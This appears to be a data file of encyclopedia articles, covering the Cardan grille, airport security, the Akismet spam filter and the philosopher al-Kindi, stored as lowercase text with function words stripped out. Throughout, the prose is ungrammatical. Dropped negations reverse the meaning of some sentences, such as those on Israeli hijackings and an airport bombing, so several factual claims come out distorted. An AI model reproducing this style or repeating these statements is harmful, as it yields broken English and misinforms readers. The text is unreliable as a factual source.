removing grille, fragments filled create note letter disguises true message. cardano suggested drafting text three times order smooth irregularities might indicate hidden words. recipient message must possess identical grille. copies grilles original template, many different patterns could made one-to-one correspondence. grille placed four positions face face down, upright reversed increases number possible cell positions fourfold. practice difficult construct innocent message around hidden text. stilted language draws attention purpose cardan grille create message “without suspicion” words francis bacon. task easier cardano, 16th century spelling standardised left much room contractions adornments penmanship. detection messages when executed badly, cardan message stands stilted language uneven writing. analyst attempt reconstruct grille several examples suspect messages correspondent. when executed well, cardan message difficult spot. even analyst suspects presence message, innocent letter contain apparently hidden text. practice, solution obtain grille itself. disadvantages method slow requires literary skill. above all, physical cipher device subject loss, theft seizure; lose grille lose secret correspondence constructed grille. possession grille incriminating. cardan grille, original form, literary cryptographic interest. example, controversy surrounds voynich manuscript could 16th-century fake cipher text, possibly constructed cardan grille used generate pseudo-random nonsense pre-existing text. also grille (cryptography) references david kahn, codebreakers comprehensive history secret communication ancient times internet, 1996, isbn 0-684-83130-9. external links https://web.archive.org/web/20111005155213/http://www2.si.umich.edu/spies/methods-mask.html</t>
  </si>
  <si>
    <t>Airport security</t>
  </si>
  <si>
    <t>airport security includes techniques methods used attempt protect passengers, staff, aircraft, airport property malicious harm, crime, terrorism, threats. aviation security combination measures human material resources order safeguard civil aviation acts unlawful interference. unlawful interference could acts terrorism, sabotage, threat life property, communication false threat, bombing, etc. description large numbers people pass airports every day. this presents potential targets terrorism forms crime number people located place. similarly, high concentration people large airliners increases potentially high death rate attacks aircraft, ability hijacked airplane lethal weapon provide alluring target terrorism (such september attacks). airport security attempts prevent threats potentially dangerous situations arising entering country. airport security succeed chances dangerous situation, illegal items threats entering aircraft, country airport greatly reduced. such, airport security serves several purposes: protect airport country threatening events, reassure traveling public safe protect country people.monte belger u.s. federal aviation administration notes "the goal aviation security prevent harm aircraft, passengers, crew, well support national security counter-terrorism policy." airport enforcement authority while countries agency protects airports (such australia, australian federal police polices airport), countries protection controlled state local level. primary personnel vary include: police force hired dedicated airport e.g. irish airport police service branch (substation) local police department stationed airport members local police department assigned airport normal patrol area members country's airport protection service police services explosive detection, drug detection purposesother resources include: security guards paramilitary forces military forces process equipment some incidents result travelers carrying either weapons items could used weapons board aircraft hijack plane. travelers screened metal detectors and/or millimeter wave scanners. explosive detection machines used include x-ray machines explosives trace-detection portal machines (a.k.a. "puffer machines"). cases, detection explosives automated using machine learning techniques. united states, working scanning machines still effective searching objects allowed airplanes depict passengers state undress find embarrassing. explosive detection machines also used carry-on checked baggage. these detect volatile compounds given explosives using chromatography.computed tomography walk-through body scanning (thz radiation) also done. artificial intelligence systems also used, example translation service information stations around airport reducing time airplanes spend gate flights monitoring analyzing everything happens aircraft lands). future, also used conjunction machines radiation detectors. also used biometric deployment across touchpoints solutions, risk-based screening intelligent video analytics.a recent development controversial backscatter x-rays detect hidden weapons explosives passengers. these devices, compton scattering, require passenger stand close flat panel produce high resolution image. technology released israel early 2008 allows passengers pass metal detectors without removing shoes, process required walk-through gate detectors reliable detecting metal shoes lower body extremities. alternately, passengers step fully shoed onto device scans seconds objects small razor blade. countries, specially trained individuals engage passengers conversation detect threats rather solely relying equipment find threats.a single backscatter scan exposes target 0.05 microsievert radiation. comparison, exposure standard chest x-ray almost times higher.generally people screened airport security areas exit gates aircraft located. these areas often called "secure", "sterile" airside. passengers discharged airliners sterile area usually re-screened disembarking domestic flight; however still subject search time. airport food outlets started using plastic glasses utensils opposed glasses made glass utensils made metal reduce usefulness items weapons.in united states non-passengers allowed concourses meet arriving friends relatives gates, greatly restricted terrorist attacks. non-passengers must obtain gate pass enter secure area airport. common reasons non-passenger obtain gate pass assist children elderly well attending business meetings take place secure area airport. united states, least hours notice generally required planning attend business meeting inside secure area airport. other countries, australia restrict non-travellers accessing airside area, however non-travellers typically subject security scans travellers.sensitive areas airports, including airport ramps operational spaces, restricted general public. called sida (security identification display area), spaces require special qualifications enter. systems consist physical access control gates passive systems monitor people moving restricted areas sound alert restricted area entered.throughout world, dozen airports instituted version "trusted traveler program". proponents argue security screening made efficient detecting people threats searching them. they argue searching trusted, verified individuals take amount time does. critics argue programs decrease security providing easier path carry contraband through.another critical security measure used several regional international airports fiber optic perimeter intrusion detection systems. these security systems allow airport security locate detect intrusion airport perimeter, ensuring real-time, immediate intrusion notification allows security personnel assess threat track movement engage necessary security procedures. this notably utilised dulles international airport u.s. military jfpass. notable incidents world's first terrorist attack flight cubana flight october 1976, airliner flying barbados jamaica brought time bombs, killing people. evidence implicated several central intelligence agency-linked anti-castro cuban exiles members venezuelan secret police disip, including luis posada carriles.the single deadliest airline catastrophe resulting failure airport security detect onboard bomb india flight 1985, killed people. another onboard bomb slipped airport security flight 1988, killed people; plane, residents lockerbie, scotland. another notable failure 1994 bombing philippine airlines flight 434, turned test planned terrorist attack called operation bojinka. explosion small, killing person, plane made emergency landing. operation bojinka discovered foiled manila police 1995. 1972, three members japanese army undertook terrorist attack, popularly called airport massacre, airport, known gurion international airport, aviv. firing indiscriminately automatic firearms throwing grenades, managed kill people injure others neutralized (one suicide). three terrorists, kozo okamoto, survived incident. rome vienna airport attacks december 1985 instances airport security failures. attacks left people dead gunmen threw grenades opened fire travelers airline ticket counters. september attacks widely recognized terrorist attacks recent times involving travel. morning september 2001, members islamic terrorist group al-qaeda took control four airplanes east coast united states deliberately crashed world trade center towers york city third pentagon arlington county, virginia. fourth plane crashed field near shanksville, pennsylvania, reaching washington, d.c., intended target, either u.s. capitol white house. attacks resulted deaths 2,996 people, including civilians, enforcement officer, hijackers board four airplanes. july 2002, gunman opened fire angeles international airport (israel's ticket counter). shooter killed people injured four. august 2006, security airports united kingdom, canada, united states raised significantly uncovering british authorities terror plot aimed detonating liquid explosives flights originating countries. this also notable first time u.s. terror alert level ever reached "red". incident also tighter restrictions carrying liquids gels hand luggage canada, united states.on 2020, southwest airlines flight 1392 struck killed pedestrian landing runway austin–bergstrom international airport. injuries reported passengers crew aboard aircraft. victim, badged airport employee, subsequently confirmed breached airport security reaching runway. accident investigation. airport security country/region canada restrictions involving airport security determined transport canada implemented canadian transport security authority (catsa) conjunction airport operator since september attacks, well india bombing 1985 incidents, airport security tightened canada order prevent attacks canadian airspace. catsa uses x-ray machines verify contents carry-ons well metal detectors, explosive trace detection (etd) equipment random physical searches passengers pre-board screening points. x-ray machines, machines, high-resolution x-rays etds also used scan checked bags. checked baggage always x-rayed major commercial airports. catsa launched restricted area identity card (raic) program january 2007. raic world's first dual biometric access control system airports. this program replaces airport restricted area passes issued airport employees security checks canadian security intelligence service, royal canadian mounted police (rcmp) transport canada cards (issued checks conducted) contain biometric information (fingerprints iris scans) belonging person issued raic. while catsa responsible pre-board passenger random non-passenger screening, contract third-party "service providers" g4s, securitas gardaworld train, manage employ screening officers. addition, individual airport authorities privatized 1990s canadian government responsible general airport security rather catsa normally contract private companies case large airports, small contingent local police officers remain site well. safety security canada's airports provided local police forces. rcmp used provide service airports, remains today: vancouver international airport rcmp richmond detachment calgary international airport calgary police service airport unit (1997) edmonton international airport rcmp edmonton international airport detachment winnipeg james armstrong richardson international airport winnipeg police service (1997) toronto pearson international airport peel regional police airport division (1997) assistance rcmp toronto airport detachment ottawa macdonald–cartier international airport ottawa police service airport policing section (1997) montréal-pierre elliott trudeau international airport airport unit montreal police service assistance rcmp airport unit halifax stanfield international airport halifax regional police european union regulation (ec) 300/2008 european parliament council establishes common rules european union protect civil aviation acts unlawful interference. regulation's provisions apply airports parts airports located country used exclusively military purposes. provisions also apply operators, including carriers, providing services aforementioned airports. also applies entities located inside outside airport premises providing services airports. standards regulation 300/2008 implemented commission regulation (eu) 2015/1998.the regulation 2320/2002 2002 introduced requirement security checks passenger flights, also domestic. some countries checks domestic flights around 2005 (introducing full security checks took time since terminals might need expansion). finland passenger, luggage freight security checking security guard duties outsourced contractors. general public security responsibility finnish police, airport unit helsinki airport. airport unit criminal investigation, canine tepo (terrorist bomb) squad, (police, customs border guard) intelligence component. furthermore, units finnish border guard units airports often arrest wanted individuals fugitives border, finnish customs seizes e.g. weapons, false documents explosives addition wanted individuals. france french security stepped since terrorist attacks france 1986. response france established vigipirate program. program uses troops reinforce local security increases requirements screenings checks. since 1996 security check-points transferred police nationale/gendarmerie l'air private companies hired airport authorities. iceland member european economic area, iceland adopted regulation 300/2008 national thus complies standards airport security international flights. domestic flights within icelandic territory however exempted security rules. exemption granted joint committee citing geographical remoteness country well population density small size aircraft used domestic operations. netherlands airport security netherlands provided koninklijke marechaussee, royal military constabulary. addition royal military constabulary, security services around airports netherlands provided multiple private security companies. spain airport security spain provided police forces, well private security guards. policía nacional provides general security well passport international airports) documentation checking. catalonia basque country, mossos d'esquadra ertzaintza, respectively, replaced policía nacional except documentation functions. guardia civil handles security customs checking, often aided private security guards. local police provide security traffic control outside airport building. security measures controlled state-owned company aena, bound european commission regulations, european union countries. sweden airport security handled security guards provided airport itself, police assistance needed. airport fire fighters also security guards. swedish transport agency decides rules check, based international regulations. airports generally defined "protected objects", give guards extra authority, like demanding identity documents search people's belongings. sweden traditionally seen low-crime country little need security checks. sweden introduced security checks international departures international regulations demanded around 1970s/1980s. september 2001, decision introduce security checks also domestic flights. this took years implement domestic airports terminals prepared room this. united kingdom department transport (dft) governing authority airport security united kingdom, civil aviation authority (caa) also responsible certain security regulatory functions. september 2004, home office, started initiative called "multi agency threat risk assessment" (matra), piloted five united kingdom's major airports heathrow, birmingham, east midlands airport, newcastle glasgow. following successful trials, scheme rolled across airports. since september attacks york washington, united kingdom assessed high risk country support united states invasion afghanistan iraq. from january 2008, travelers longer limited single piece carry-on luggage uk's major airports. currently, hand luggage limited size weight dft/caa, although airlines impose rules. trialed controversial method screening passengers improve airport security using backscatter x-ray machines provide 360-degree view person, well "see" clothes, right skin bones. they longer used replaced millimeter wave scanners shows hidden items showing body passenger. hong kong hong kong international airport secured hong kong police force aviation security company (avseco). within police force, airport district responsible safety security airport region. airport security units deployed around airport armed sub-machine guns glock pistols. security restricted area responsibility police avseco. while airport control airport authority hong kong (aahk), security power delegated avseco staffs. persons baggages carried must x-rayed checked security screening points avseco (with exceptions tenant restricted area). immigration department check incomers passport identities, customs excise department check passengers crews' luggage discourage smuggling drugs contraband entering hong kong. india india stepped airport security 1999 kandahar hijacking. central industrial security force, paramilitary organisation, charge airport security regulatory framework bureau civil aviation security (ministry civil aviation). cisf formed airport security group protect indian airports. every airport given apsu (airport security unit), trained unit counter unlawful interference civil aviation. apart cisf, every domestic airline security group looks aircraft security. terrorist threats narcotics main threats indian airports. another problem airports face proliferation slums around airport boundaries places like mumbai. before boarding, additional searching hand luggage likely. moreover, this, cisf many duties context aviation security. cargo security screening done regulated agents airlines' airports' security staff tested certified bureau civil aviation security (bcas), aviation security regulator. israel airlines headquartered israel. last hijacking occurred july 1968, plane departing gurion airport, outside aviv, ever hijacked.it 1972 terrorists japanese army launched attack deaths least people airport. since then, security airport relies number fundamentals, including heavy focus raphael ron, former director security gurion airport, terms "human factor", generalized "the inescapable fact terrorist attacks carried people found stopped effective security methodology."on december 1985, terrorists simultaneously attacked ticket counters rome, italy vienna, austria airports using machine guns hand grenades. nineteen civilians killed many wounded. response, israel developed methods stop massacres drastically improved security measures around israeli airports even promised provide plainclothes armed guards foreign airport. last successful airline-related terrorist attack 1986, security agent found suitcase full explosives initial screening process. while make board, injure detonating terminal.as part focus so-called "human factor," israeli security officers interrogate travelers using racial profiling, singling appear arab based name physical appearance. additionally, passengers, even appear arab descent, questioned traveling israel, followed several general questions trip order search inconsistencies. although numerous civil rights groups demanded profiling, israel maintains effective unavoidable. according ariel merari, israeli terrorism expert, would foolish profiling everyone knows terrorists come certain ethnic groups. they likely muslim young, potential threat justifies inconveniencing certain ethnic group.passengers leaving israel checked computerized list. computers, maintained israeli ministry interior, connected israeli police, fbi, canadian security intelligence service (csis), scotland yard, shin bet, interpol order catch suspects others leaving country illegally.despite tight security, incident occurred november 2002, apparently slipped airport security gurion airport pocketknife attempted storm cockpit flight route aviv istanbul, turkey. while injuries reported attacker subdued guards hidden among passengers minutes plane landed safely turkey, authorities shut gurion time attack reassess security situation investigation opened determine man, israeli arab, managed smuggle knife past airport security.at conference 2008, united states department homeland security secretary michael chertoff told reuters interviewers united states seek adopt israeli security measures domestic airports. left post january 2009, mere months statement, enough time implement them.on limited focus, american airports turning israeli government israeli-run firms help upgrade security post-9/11 world. israeli officials toured angeles airport november 2008 re-evaluate airport making security upgrade recommendations 2006. calling gurion "the world's safest airport," antonio villaraigosa, mayor angeles, implemented israeli review order bring state-of-the-art technology tactical measures help secure lax, considered state's primary terrorist target singled qaeda network. security solutions, former director security gurion based washington, d.c., consults aviation security boston's logan international airport.other u.s. airports incorporate israeli tactics systems include port oakland diego county regional airport authority. "the israelis legendary security, opportunity firsthand and, importantly, theory behind it," said steven grossman, director aviation port oakland. impressed briefing presented israelis suggested trip israel u.s. branch airports council international order gain deeper understanding methods employed israeli airport security enforcement. pakistan pakistan airports security force (asf) responsible protecting airports facilities planes. safeguards civil aviation industry unlawful interference, adopting counter terrorism measures, preventing crime maintaining order within limits airports pakistan. singapore security country's international passenger airports comes purview airport police division singapore police force, although resources concentrated singapore changi airport scheduled passenger traffic dominates. seletar airport, specializes handling non-scheduled training flights, seen posing less security issue. since september attacks, naming changi airport terrorism target jemaah islamiyah, airport's security stepped roving patrol teams soldiers police officer armed automatic weapons patrol terminals random. departing passengers checked entrance gate rather immigration clearance unlike hong kong international airport. this security measure easily noticed presence x-ray machines metal detectors every gate, normally seen airports. assisting state organizations, security services provided ground handlers, namely certis cisco, singapore airport terminal services's sats security services, aetos security management private limited, formed merger changi international airport services's airport security unit companies become single island-wide auxiliary police company. these officers' duties include screening luggage controlling movement restricted areas. since 2005, upgrade screening technology rising security concerns luggage-screening processes conducted behind closed doors. plans also place install cameras monitor airport, discourage bomb attacks similar 2005 songkhla bombings southern thailand international airport targeted. tenders incorporate system called late september 2005.since 2007, liquid restrictions enforced, following 2006 transatlantic aircraft plot. passengers advised check liquids, gels aerosols failing confiscated airport security post back oneself. anything security areas allowed. general practice, unacceptable materials also confiscated post back (excluding nail clippers, nail files, umbrellas racquets). united states prior 1970s, american airports minimal security arrangements prevent acts terrorism. flights unassigned seating, reservations required, fares collected air. federal security personnel started serving high-risk flights 1962 peace officers program; marshals began working miami field office united states marshals service 1969. (hijackers typically wanted defect cuba, making flights florida common targets.) there insufficient numbers protect every flight, hijackings continued take place. first hijacking resulting fatality occurred eastern lines shuttle flight 1320 1970. later 1970, marshall staffing increased, passengers fitting behavioral profile screened weapons (including handheld metal detectors).on november 1972, trio hijackers threatened southern airways flight nuclear reactor ridge national laboratory. direct response incident, federal aviation administration required airlines begin screening passengers carry-on baggage january 1973. this screening generally contracted private security companies. private companies would contracts. airline operational control departure concourse controlled given checkpoint would hold contract. although airline would control operation checkpoint, oversight authority held faa. c.f.r. title restrictions permit relevant airport authority exercise oversight checkpoint operations. 1974 film, parallax view, shows early airport security checkpoint operation. september attacks prompted even tougher regulations, limiting number types items passengers could carry board aircraft requiring increased screening passengers fail present government-issued photo aviation transportation security generally required november 2002, passenger screening must conducted federal employees. result, passenger baggage screening provided transportation security administration (tsa), part u.s. department homeland security. provisions improve technology detecting explosives included terrorism prevention 2004. often, security category airports, u.s. largest busiest measured volume passenger traffic, provided private contractors. because high volume passenger traffic, category airports considered vulnerable targets terrorism. following failed 2006 liquid bomb plot, united states homeland security banned liquids gels except baby formula prescription medicines name ticket holder carry-on luggage flights started requiring passengers remove shoes screening.from august 2006, airline passengers united states could take (101 non-prescription medicine, glucose diabetics, solid lipstick, baby food aboard flights. eventually passengers allowed carry (3.5 liquid hand luggage, standards required non-medical liquids kept quart-sized plastic bag, passenger.with increase security screening, airports long queues security checks. alleviate this, airports created premium lines passengers traveling first business class, elite members particular airline's frequent flyer program. "screening passengers observation techniques" (spot) program operating u.s. airports. category airports united states also travel firearms ammunition airport privacy infrastructure security security theaterus specific: computer assisted passenger prescreening system registered traveler airport racial profiling united states secondary security screening selection secure flight references external links canadian transport security authority transport canada u.s. u.s. transportation security administration sociedad europea detección indian aviation security</t>
  </si>
  <si>
    <t>Akismet</t>
  </si>
  <si>
    <t>akismet service filters spam comments, trackbacks, contact form messages. filter works combining information spam captured participating sites, using spam rules block future spam. akismet offered automattic, company behind wordpress.com.launched october 2005, akismet said captured billion spam comments pings november 2021. history according himself, founder automattic, matt mullenweg, decided create akismet mother could blog safety. 2005, discussions deal comment spam, plug-ins available purpose. mullenweg's first attempt javascript plug-in modified comment form fields, within hours launch spammers downloaded figured worked, bypassed late 2005, mullenweg launched akismet plug-in wordpress. akismet (which stands automatic kismet) dealing spam aggregate, crowd-sourced spam-fighting tool. each time someone posts comment participating website, akismet checks comments database. spam, deleted. spam gets user marks spam, comment added database pool spam comments widens, making akismet increasingly effective time. using akismet akismet originally developed integrate plug-in wordpress. akismet plug-in included default wordpress builds since version activated wordpress.com-hosted blogs. public akismet resulted third-party plug-ins platforms. official akismet plug-in release open source internet forum software discourse.to akismet, necessary obtain key. this necessary site communicate akismet servers. development distribution released terms general public license, akismet plug-in free software, although code akismet system (and nature algorithm used) released. akismet service free personal and, november 2021, commercial plans start less $10/month. references external links official website</t>
  </si>
  <si>
    <t>Al-Kindi</t>
  </si>
  <si>
    <t>yūsuf yaʻqūb ʼisḥāq aṣ-ṣabbāḥ al-kindī arabic: يوسف يعقوب إسحاق الصبّاح الكندي; latin: alkindus; 801–873 arab muslim philosopher, polymath, mathematician, physician music theorist. al-kindi first islamic peripatetic philosophers, hailed "father arab philosophy".al-kindi born kufa educated baghdad. became prominent figure house wisdom, number abbasid caliphs appointed oversee translation greek scientific philosophical texts arabic language. this contact "the philosophy ancients" hellenistic philosophy often referred muslim scholars) profound effect him, synthesized, adapted promoted hellenistic peripatetic philosophy muslim world. subsequently wrote hundreds original treatises range subjects ranging metaphysics, ethics, logic psychology, medicine, pharmacology, mathematics, astronomy, astrology optics, afield practical topics like perfumes, swords, jewels, glass, dyes, zoology, tides, mirrors, meteorology earthquakes.in field mathematics, al-kindi played important role introducing indian numerals islamic world, subsequently, relabeled arabic numerals, christian world, along al-khwarizmi. al-kindi also fathers cryptography. building work al-khalil (717–786), al-kindi's book entitled manuscript deciphering cryptographic messages gave rise birth cryptanalysis, earliest known statistical inference, introduced several methods breaking ciphers, notably frequency analysis. using mathematical medical expertise, able develop scale would allow doctors quantify potency medication.the central theme underpinning al-kindi's philosophical writings compatibility philosophy "orthodox" islamic sciences, particularly theology, many works deal subjects theology immediate interest these include nature god, soul prophetic knowledge. despite important role played making philosophy accessible muslim intellectuals, philosophical output largely overshadowed al-farabi texts available modern scholars examine. early life al-kindi born kufa aristocratic family kinda tribe, descended chieftain al-ash'ath qays, contemporary prophet muhammad family belonged prominent families tribal nobility kufa early islamic period, lost much power following revolt al-rahman muhammad al-ash'ath. father ishaq governor kufa, al-kindi received preliminary education there. later went complete studies baghdad, patronized abbasid caliphs al-ma'mun (ruled 813–833) al-mu'tasim 833–842). account learning aptitude study, al-ma'mun appointed house wisdom, recently established centre translation greek philosophical scientific texts, baghdad. also well known beautiful calligraphy, point employed calligrapher al-mutawakkil.when al-ma'mun died, brother, al-mu'tasim became caliph. al-kindi's position would enhanced al-mu'tasim, appointed tutor son. accession al-wāthiq 842–847), especially al-mutawakkil 847–861), al-kindi's star waned. there various theories concerning this: attribute al-kindi's downfall scholarly rivalries house wisdom; others refer al-mutawakkil's often violent persecution unorthodox muslims well non-muslims); point al-kindi beaten library temporarily confiscated. henry corbin, authority islamic studies, says 873, al-kindi died lonely man", baghdad reign al-mu'tamid 870–892).after death, al-kindi's philosophical works quickly fell obscurity many lost even later islamic scholars historians. felix klein-franke suggests number reasons this: aside militant orthodoxy al-mutawakkil, mongols also destroyed countless libraries invasion. however, says probable cause writings never found popularity amongst subsequent influential philosophers al-farabi avicenna, ultimately overshadowed him. philosophical career peaked al-mu‘tasim, al-kindi dedicated famous work, first philosophy, whose ahmad tutored al-kindi. accomplishments according arab bibligrapher al-nadim, al-kindi wrote least hundred sixty books, contributing heavily geometry (thirty-two books), medicine philosophy (twenty-two books each), logic (nine books), physics (twelve books). although books lost centuries, survived form latin translations gerard cremona, others rediscovered arabic manuscripts; importantly, twenty-four lost works located mid-twentieth century turkish library. philosophy greatest contribution development islamic philosophy efforts make greek thought accessible acceptable muslim audience. al-kindi carried mission house wisdom (bayt al-hikma), institute translation learning patronized abbasid caliphs, baghdad. well translating many important texts, much become standard arabic philosophical vocabulary originated al-kindi; indeed, him, work philosophers like al-farabi, avicenna, al-ghazali might possible.in writings, al-kindi's central concerns demonstrate compatibility philosophy natural theology hand, revealed speculative theology (though fact rejected speculative theology). despite this, make clear believed revelation superior source knowledge reason guaranteed matters faith reason could uncover. philosophical approach always original, even considered clumsy later thinkers (mainly first philosopher writing arabic language), successfully incorporated aristotelian (especially) neo-platonist thought islamic philosophical framework. this important factor introduction popularization greek philosophy muslim intellectual world. astronomy al-kindi took view solar system ptolemy, placed earth centre series concentric spheres, known heavenly bodies (the moon, mercury, venus, sun, mars, jupiter, stars) embedded. treatises subject, says bodies rational entities, whose circular motion obedience worship god. their role, al-kindi believes, instruments divine providence. furnishes empirical evidence proof assertion; different seasons marked particular arrangements planets stars (most notably sun); appearance manner people varies according arrangement heavenly bodies situated homeland.however, ambiguous comes actual process heavenly bodies affect material world. theory posits works aristotle, conceived movement bodies causes friction sub-lunar region, stirs primary elements earth, fire, water, combine produce everything material world. alternative view found treatise rays planets exercise influence straight lines. these, presents fundamentally different views physical interaction; action contact action distance. this dichotomy duplicated writings optics.some notable astrological works al-kindi include: book judgement stars, including forty chapters, questions elections. stellar rays (spurious) several epistles weather meteorology, including mutatione temporum, ("on changing weather"). treatise judgement eclipses. treatise dominion arabs duration (used predict arab rule). choices days elections). revolutions years mundane astrology natal revolutions). signis astronomiae applicitis mediciam signs astronomy applied medicine' treatise spirituality planets. optics al-kindi first major writer optics since antiquity. roger bacon placed first rank ptolemy writer topic. work known west radiis stellarum, al-kindi developed theory "that everything world emits rays every direction, fill whole world." this theory active power rays influence later scholars al-haytham, robert grosseteste roger bacon.two major theories optics appear writings al-kindi; aristotelian euclidean. aristotle believed order perceive object, object must contact transparent medium (such air) filled light. when criteria met, "sensible form" object transmitted medium eye. hand, euclid proposed vision occurred straight lines "rays" reached illuminated object reflected back. theories astrology, dichotomy contact distance present al-kindi's writings subject well. factor al-kindi relied upon determine theories correct adequately explained experience seeing. example, aristotle's theory unable account angle individual sees object affects perception example, circle viewed side appear line. according aristotle, complete sensible form circle transmitted appear circle. hand, euclidean optics provided geometric model able account this, well length shadows reflections mirrors, euclid believed visual "rays" could travel straight lines (something commonly accepted modern science). reason, al-kindi considered latter preponderant.al-kindi's primary optical treatise aspectibus" later translated latin. this work, along alhazen's optics arabic translations ptolemy euclid's optics, main arabic texts affect development optical investigations europe, notably robert grosseteste, vitello roger bacon. medicine there thirty treatises attributed al-kindi field medicine, chiefly influenced ideas galen. important work field probably gradibus, demonstrates application mathematics medicine, particularly field pharmacology. example, developed mathematical scale quantify strength drug system, based phases moon, would allow doctor determine advance critical days patient's illness. according plinio prioreschi, first attempt serious quantification medicine. chemistry al-kindi denied possibility transmuting base metals precious metals gold silver, position later attacked persian chemist physician bakr al-razi 865–925).one work attributed al-kindi, variously known kitāb al-taraffuq l-ʿiṭr ("the book gentleness perfume") kitāb kīmiyāʾ al-ʿiṭr wa-l-taṣʿīdāt ("the book chemistry perfume distillations"), contains earliest known references distillation wine. work also describes distillation process extracting rose oils, provides recipes different kinds perfumes. mathematics al-kindi authored works number important mathematical subjects, including arithmetic, geometry, indian numbers, harmony numbers, lines multiplication numbers, relative quantities, measuring proportion time, numerical procedures cancellation. also wrote four volumes, indian numerals (arabic: كتاب استعمال الأعداد الهندية kitāb isti`māl al-'a`dād al-hindīyyah) contributed greatly diffusion indian system numeration middle-east west. geometry, among works, wrote theory parallels. also related geometry works optics. ways made mathematics philosopher attempt disprove eternity world demonstrating actual infinity mathematical logical absurdity. cryptography al-kindi credited developing method whereby variations frequency occurrence letters could analyzed exploited break ciphers (i.e. cryptanalysis frequency analysis). book topic risāla istikhrāj al-kutub al-mu'ammāh (رسالة استخراج الكتب المعماة; literally: extracting obscured correspondence, contemporarily: decrypting encrypted correspondence). treatise cryptanalysis, wrote:one solve encrypted message, know language, find different plaintext language long enough fill sheet count occurrences letter. call frequently occurring letter "first", next occurring letter "second", following occurring letter "third", account different letters plaintext sample. then look cipher text want solve also classify symbols. find occurring symbol change form "first" letter plaintext sample, next common symbol changed form "second" letter, following common symbol changed form "third" letter, account symbols cryptogram want solve. al-kindi influenced work al-khalil (717–786), wrote book cryptographic messages, contains first permutations combinations list possible arabic words without vowels. meteorology treatise entitled risala l-illa al-failali l-madd l-fazr (treatise efficient cause flow ebb), al-kindi presents theory tides "depends changes take place bodies owing rise fall temperature." order support argument, gave description scientific experiment follows: also observe senses... consequence extreme cold changes water. this, takes glass bottle, fills completely snow, closes carefully. then determines weight weighing. places container... previously weighed. surface bottle changes water, appears upon like drops large porous pitchers, considerable amount water gradually collects inside container. weighs bottle, water container, finds weight greater previously, proves change. [...] some foolish persons opinion snow exudes glass. this impossible. there process water snow made pass glass. explaining natural cause wind, difference directions based time location, wrote: when northern declination northerly places heat cold towards south. then northern expand southerly direction heat contraction southern air. therefore summer winds merits winter winds not. music theory al-kindi first great theoretician music arab-islamic world. known written fifteen treatises music theory, five survived. added fifth string 'ud. works included discussions therapeutic value music regarded "cosmological connections" music. philosophical thought influences while muslim intellectuals already acquainted greek philosophy (especially logic), al-kindi credited first real muslim philosopher. thought largely influenced neo-platonic philosophy proclus, plotinus john philoponus, amongst others, although appear borrowed ideas hellenistic schools well. makes many references aristotle writings, often unwittingly re-interpreted neo-platonic framework. this trend obvious areas metaphysics nature causal entity. experts suggested influenced mutazilite school theology, mutual concern demonstrated maintaining singularity (tawhid) god. minority view however holds agreements considered incidental. metaphysics according al-kindi, goal metaphysics knowledge god. reason, make clear distinction philosophy theology, believes concerned subject. later philosophers, particularly al-farabi avicenna, would strongly disagree issue, saying metaphysics actually concerned being, such, nature purely incidental.central al-kindi's understanding metaphysics god's absolute oneness, considers attribute uniquely associated (and therefore shared anything else). means think existent thing "one", fact "one" many". example, says body one, also composed many different parts. person might elephant", means elephant", term 'elephant' refers species animal contains many. therefore, absolutely one, concept, lacking multiplicity whatsoever. some feel understanding entails rigorous negative theology implies description predicated anything else, cannot said god.in addition absolute oneness, al-kindi also described creator. this means acts final efficient cause. unlike later muslim neo-platonic philosophers (who asserted universe existed result god's existence "overflowing", passive act), al-kindi conceived active agent. fact, agent, intermediary agencies contingent upon him. idea "acts" created intermediaries, turn "act" another chain cause effect produce desired result. reality, intermediary agents "act" all, merely conduit god's action. this especially significant development islamic philosophy, portrayed "first cause" "unmoved mover" aristotelian philosophy compatible concept according islamic revelation. epistemology al-kindi theorized separate, incorporeal universal intellect (known "first intellect"). first god's creation intermediary things came creation. aside obvious metaphysical importance, also crucial al-kindi's epistemology, influenced platonic realism.according plato, everything exists material world corresponds certain universal forms heavenly realm. these forms really abstract concepts species, quality relation, apply physical objects beings. example, apple quality "redness" derived appropriate universal. however, al-kindi says human intellects potentially able comprehend these. this potential actualized first intellect, perpetually thinking universals. argues external agency intellect necessary saying human beings cannot arrive universal concept merely perception. words, intellect cannot understand species thing simply examining instances. according him, yield inferior "sensible form", universal form desire. universal form attained contemplation actualization first intellect.the analogy provides explain theory wood fire. wood, argues, potentially (just human potentially thinking universal), therefore requires something else already (such fire) actualize this. this means human intellect think something, first intellect must already thinking therefore, says first intellect must always thinking everything. once human intellect comprehends universal process, becomes part individual's "acquired intellect" thought whenever wishes. soul afterlife al-kindi says soul simple, immaterial substance, related material world faculties operate physical body. explain nature worldly existence, (borrowing epictetus) compares ship has, course ocean voyage, temporarily anchored island allowed passengers disembark. implicit warning passengers linger long island left behind ship sets sail again. here, al-kindi displays stoic concept, must become attached material things (represented island), invariably taken away (when ship sets sail again). connects neo-platonist idea, saying soul directed towards pursuit desire pursuit intellect; former body, body dies, also die, latter free body allow survive light creator" realm pure intelligence. relationship revelation philosophy view al-kindi, prophecy philosophy different routes arrive truth. contrasts positions four ways. firstly, person must undergo long period training study become philosopher, prophecy bestowed upon someone god. secondly, philosopher must arrive truth devices (and great difficulty), whereas prophet truth revealed god. thirdly, understanding prophet divinely revealed clearer comprehensive philosopher. fourthly, prophet able express understanding ordinary people superior. therefore, al-kindi says prophet superior fields: ease certainty receives truth, presents however, crucial implication content prophet's philosopher's knowledge same. this, says adamson, demonstrates limited superiority al-kindi afforded prophecy was.in addition this, al-kindi adopted naturalistic view prophetic visions. argued that, faculty "imagination" conceived aristotelian philosophy, certain "pure" well-prepared souls, able receive information future events. significantly, attribute visions dreams revelation god, instead explains imagination enables human beings receive "form" something without needing perceive physical entity refers. therefore, would seem imply anyone purified would able receive visions. precisely idea, amongst naturalistic explanations prophetic miracles al-ghazali attacks incoherence philosophers. critics patrons while al-kindi appreciated usefulness philosophy answering questions religious nature, would many islamic thinkers enthusiastic potential. would incorrect assume opposed philosophy simply "foreign science". oliver leaman, expert islamic philosophy, points objections notable theologians rarely directed philosophy itself, rather conclusions philosophers arrived even al-ghazali, famous critique philosophers, expert philosophy logic. criticism arrived theologically erroneous conclusions. three serious these, view, believing co-eternity universe god, denying bodily resurrection, asserting knowledge abstract universals, particular things (not philosophers subscribed views).during life, al-kindi fortunate enough enjoy patronage pro-mutazilite caliphs al-ma'mun al-mu'tasim, meant could carry philosophical speculations relative ease. time, al-kindi would criticized extolling "intellect" immanent creation proximity god, commonly held position angels. also engaged disputations certain mutazilites, attacked belief atoms, mutazilites accepted belief atomism. real role al-kindi conflict 